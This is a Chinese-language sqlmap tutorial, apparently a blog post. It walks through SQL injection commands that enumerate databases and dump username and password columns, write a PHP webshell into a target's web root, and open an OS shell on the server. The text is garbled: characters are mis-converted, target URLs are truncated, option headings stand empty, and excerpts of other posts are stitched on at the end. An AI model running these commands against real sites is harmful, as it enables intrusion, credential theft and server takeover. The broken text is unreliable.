sqlmap使用教程

2022-08-22 18:48:14 字數 2733 閱讀 2510

sqlmap也是滲透中常用的乙個注入工具,其實在注入工具方面,乙個sqlmap就足夠用了,只要你用的熟,秒殺各種工具,只是乙個便捷性問題,sql注入另一方面就是手工黨了,這個就另當別論了。

學習sqlmap前,建議了解sql注入實現原理與基本的手工注入操作,更易於理解sqlmap的使用。

我的另乙個筆記整理:可能是網上最易懂的sql手工注入教程【個人筆記精華整理】

針對sqlmap注入過waf,可以參考:sqlmap注入之tamper繞過waf防火牆過濾

sqlmap支援五種不同的注入模式:

mysql, oracle, postgresql, microsoft sql server, microsoft access, ibm db2, sqlite, firebird, sybase和sap maxdb

sqlmap -u 「

預設使用level1檢測全部資料庫型別

sqlmap -u 「  –dbms mysql –level 3

指定資料庫型別為mysql,級別為3(共5級,級別越高,檢測越全面)

當注入頁面錯誤的時候,自動跳轉到另乙個頁面的時候需要跟隨302,

當注入錯誤的時候,先報錯再跳轉的時候,不需要跟隨302。

目的就是:要追蹤到錯誤資訊。

當程式有防get注入的時候,可以使用cookie注入

sqlmap -u 「 –cookie 「id=11」 –level 2(只有level達到2才會檢測cookie)

可以使用burpsuite或者temperdata等工具來抓取post包

sqlmap -r 「c:\tools\request.txt」 -p 「username」 –dbms mysql    指定username引數

sqlmap -u 「  –dbms mysql –level 3 –dbs

查詢有哪些資料庫

sqlmap -u 「  –dbms mysql –level 3 -d test –tables

查詢test資料庫中有哪些表

sqlmap -u 「  –dbms mysql –level 3 -d test -t admin –columns

查詢test資料庫中admin表有哪些字段

sqlmap -u 「  –dbms mysql –level 3 -d test -t admin -c 「username,password」 –dump

dump出欄位username與password中的資料

其他命令參考下面

sqlmap -r 「c:\tools\request.txt」 –dbms mysql -d dedecms –search -c admin,password

在dedecms資料庫中搜尋欄位admin或者password。

首先找需要**的物理路徑,其次需要有可寫或可讀許可權。

–file-read=rfile 從後端的資料庫管理系統檔案系統讀取檔案 (物理路徑)

–file-write=wfile 編輯後端的資料庫管理系統檔案系統上的本地檔案 (mssql xp_shell)

–file-dest=dfile 後端的資料庫管理系統寫入檔案的絕對路徑

#示例:

sqlmap -r 「c:\request.txt」 -p id –dbms mysql –file-dest

「e:\php\htdocs\dvwa\inc\include\1.php」 –file-write

「f:\webshell\1112.php」

使用shell命令:

sqlmap -r 「c:\tools\request.txt」 -p id –dms mysql –os-shell

接下來指定**可寫目錄:

「e:\php\htdocs\dvwa」

#注:mysql不支援列目錄,僅支援讀取單個檔案。sqlserver可以列目錄,不能讀寫檔案,但需要乙個(xp_dirtree函式)

sqlmap -u 「http://url/news?id=1「 –dbs-o 「sqlmap.log」 儲存進度

sqlmap -u 「http://url/news?id=1「 –dbs-o 「sqlmap.log」 –resume 恢復已儲存進度

以下至少需要設定其中乙個選項,設定目標url。

這些選項可以用來指定如何連線到目標url。

這些選項可以用來列舉後端資料庫管理系統的資訊、表中的結構和資料。此外,您還可以執行

您自己的sql語句。

這些選項可用於優化sqlmap的效能。

這些選項可以用來指定測試哪些引數, 提供自定義的注入payloads和可選篡改指令碼。

這些選項可以用來指定在sql盲注時如何解析和比較http響應頁面的內容。

這些選項可用於調整具體的sql注入測試。

這些選項可以被用來執行蠻力檢查。

user-defined function injection(使用者自定義函式注入):

這些選項可以用來建立使用者自定義函式。

–udf-inject 注入使用者自定義函式

–shared-lib=shlib 共享庫的本地路徑

這些選項可以被用來訪問後端資料庫管理系統的底層檔案系統。

這些選項可以用於訪問後端資料庫管理系統的底層作業系統。

這些選項可以被用來訪問後端資料庫管理系統windows登錄檔。

這些選項可以用來設定一些一般的工作引數。

Sqlmap使用教程

sqlmap也是滲透中常用的乙個注入工具,其實在注入工具方面,乙個sqlmap就足夠用了,只要你用的熟,秒殺各種工具,只是乙個便捷性問題,sql注入另一方面就是手工黨了,這個就另當別論了。sqlmap支援五種不同的注入模式 mysql,oracle,postgresql,microsoft sql ...

sqlmap使用教程

sqlmap簡介 sqlmap是乙個開源的滲透測試工具,可以用來進行自動化檢測,利用sql注入漏洞,獲取資料庫伺服器的許可權。它具有功能強大的檢測引擎,針對各種不同型別資料庫的滲透測試的功能選項,包括獲取資料庫中儲存的資料,訪問作業系統檔案甚至可以通過外帶資料連線的方式執行作業系統命令。1.支援的資...

Sqlmap使用教程 精華

sqlmap支援五種不同的注入模式 mysql,oracle,postgresql,microsoft sql server,microsoft access,ibm db2,sqlite,firebird,sybase和sap maxdb sqlmap u 預設使用level1檢測全部資料庫型別 ...